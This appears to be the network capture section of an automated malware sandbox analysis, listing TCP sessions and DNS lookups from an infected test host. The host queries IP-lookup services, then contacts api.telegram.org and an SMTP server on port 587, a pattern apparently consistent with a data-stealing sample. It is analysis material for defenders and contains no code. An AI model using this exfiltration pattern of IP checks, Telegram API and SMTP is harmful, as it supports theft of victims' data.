                                                                                                                          Oct 22, 2024 16:12:11.746685982 CEST50008443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:11.750297070 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.750299931 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.755569935 CEST8050010193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.755966902 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.756000996 CEST8050006193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.756087065 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.756181002 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.761562109 CEST8050010193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.006927013 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.008490086 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.008533001 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.152865887 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.153103113 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.153187037 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.153527975 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.171955109 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:12.173237085 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:12.178452969 CEST8050007193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.178527117 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:12.179575920 CEST8050011193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.179833889 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:12.179974079 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:12.185410023 CEST8050011193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.685612917 CEST8050010193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.686758995 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.686796904 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.686893940 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.687112093 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:12.687123060 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:12.741122007 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.069917917 CEST8050011193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.071342945 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.071407080 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.071496010 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.072041035 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.072052002 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.116121054 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.300326109 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.302588940 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.302619934 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.444755077 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.444864035 CEST44350012188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.444948912 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.445472002 CEST50012443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.449101925 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.450018883 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.455576897 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.457123995 CEST8050010193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.457938910 CEST5001080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.457952976 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.458158016 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:13.463713884 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.687253952 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.689585924 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.689630032 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.850636005 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.850739956 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.851253033 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.855422020 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.136214972 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.142066002 CEST8050011193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.142143965 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.150264978 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.155678034 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.155852079 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.157345057 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.163189888 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.301712990 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.303497076 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.303553104 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.303646088 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.304260015 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.304276943 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.350492001 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.930074930 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.931756020 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.931790113 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.993833065 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.995623112 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.995676041 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.996313095 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.996639967 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.996653080 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.038002014 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.102811098 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.102917910 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.103060007 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.103847980 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.108191013 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.109652042 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.114392996 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.114464998 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.115089893 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.115166903 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.115284920 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.121911049 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.616266012 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.617804050 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.617842913 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.761840105 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.761962891 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.762165070 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.762481928 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.765455961 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.766484022 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772087097 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.772105932 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.772175074 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772255898 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772387028 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.778278112 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.965929985 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.967536926 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967576027 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.967683077 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967869043 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967885971 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.006752014 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.603888988 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.605917931 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.623147011 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.623198032 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.623334885 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.626904964 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.626924038 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.641383886 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.641405106 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.647362947 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.782891035 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.782985926 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.783035994 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.783679962 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.786379099 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.787539005 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.792165041 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.792222977 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.793081999 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.793143988 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.793247938 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.799166918 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.250384092 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.252175093 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.252216101 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408703089 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408791065 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408931971 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.409733057 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.449424982 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:17.455260992 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.455339909 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:17.458755016 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.458811045 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.458867073 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.459371090 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.459402084 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.629726887 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.630950928 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631011009 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.631078959 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631367922 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631380081 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.678606987 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.236041069 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.238035917 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.238059044 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.313426971 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.313527107 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.315289021 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.315304041 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.315592051 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.318336964 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.359337091 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384808064 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384910107 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384977102 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.385550022 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.463965893 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.464497089 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.464555025 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.464654922 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.465081930 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.465095043 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.470617056 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.470736980 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.557230949 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.557298899 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.557471037 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.559895992 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.319473028 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.319547892 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.322042942 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.322063923 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.322314024 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.324151039 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.367333889 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566359997 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566437960 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566508055 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.608272076 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:26.375925064 CEST4999980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:26.847881079 CEST4999880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:27.633346081 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:27.634773970 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:27.640326023 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:27.640386105 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:27.642396927 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:27.642452002 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.396909952 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.397146940 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.397206068 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.397525072 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.402673960 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.403712034 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.674257040 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.677109003 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.725528955 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.725528955 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.752207994 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.752315998 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:28.757915020 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.758168936 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.997915030 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:28.999497890 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.001622915 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.005012989 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.007301092 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.010626078 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.251183033 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.251218081 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.251231909 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.251411915 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.253350019 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.253498077 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.253509045 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.253519058 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.253544092 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.253580093 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.322314024 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.323127985 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.327760935 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.328576088 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.568785906 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.569119930 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.571279049 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.571484089 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.577143908 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.577303886 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.816849947 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.816871881 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.817212105 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.819228888 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:29.822711945 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:29.824907064 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.062736034 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.063169003 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.065037966 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.065308094 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.068648100 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.070760965 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.360852003 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.360908031 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.361149073 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.361196995 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.366693974 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.366714954 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.606769085 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.606839895 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.607486963 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.607501984 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.613594055 CEST58750028213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.613678932 CEST50028587192.168.2.6213.165.67.102
                                                                                                                          Oct 22, 2024 16:12:30.615201950 CEST58750027213.165.67.102192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:30.615259886 CEST50027587192.168.2.6213.165.67.102
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 22, 2024 16:11:52.558813095 CEST6100053192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:11:52.566649914 CEST53610001.1.1.1192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.908432961 CEST5066853192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:11:53.916150093 CEST53506681.1.1.1192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.009104013 CEST5018053192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:12:00.017455101 CEST53501801.1.1.1192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.623106003 CEST5159453192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:12:03.633935928 CEST53515941.1.1.1192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.450269938 CEST5500953192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:12:17.458154917 CEST53550091.1.1.1192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:27.623809099 CEST6261053192.168.2.61.1.1.1
                                                                                                                          Oct 22, 2024 16:12:27.632742882 CEST53626101.1.1.1192.168.2.6
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 22, 2024 16:11:52.558813095 CEST192.168.2.61.1.1.10x19cbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:11:53.908432961 CEST192.168.2.61.1.1.10x44c0Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:00.009104013 CEST192.168.2.61.1.1.10x5de7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:03.623106003 CEST192.168.2.61.1.1.10xf0faStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:17.450269938 CEST192.168.2.61.1.1.10xa9dfStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:27.623809099 CEST192.168.2.61.1.1.10x6676Standard query (0)smtp.ionos.esA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 22, 2024 16:11:52.566649914 CEST1.1.1.1192.168.2.60x19cbNo error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:11:53.916150093 CEST1.1.1.1192.168.2.60x44c0No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:00.017455101 CEST1.1.1.1192.168.2.60x5de7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 22, 2024 16:12:00.017455101 CEST1.1.1.1192.168.2.60x5de7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
